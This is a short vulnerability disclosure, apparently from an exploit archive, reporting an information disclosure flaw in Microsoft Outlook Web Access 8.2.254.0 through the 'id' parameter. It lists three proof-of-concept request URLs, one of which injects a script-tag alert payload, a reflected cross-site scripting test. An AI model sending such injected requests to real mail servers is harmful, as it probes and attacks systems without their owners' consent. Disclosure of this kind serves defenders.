Microsoft Outlook Web Access (OWA) version 8.2.254.0 information disclosure vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Outlook Web Access (OWA) version 8.2.254.0 information disclosure vulnerability
# Published : 2010-05-24
# Author : Praveen Darshanam
# Previous Title : LiSK CMS v 4.4 SQL Injection Vulnerability
# Next Title : Blox CMS SQL Injection Vulnerability

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA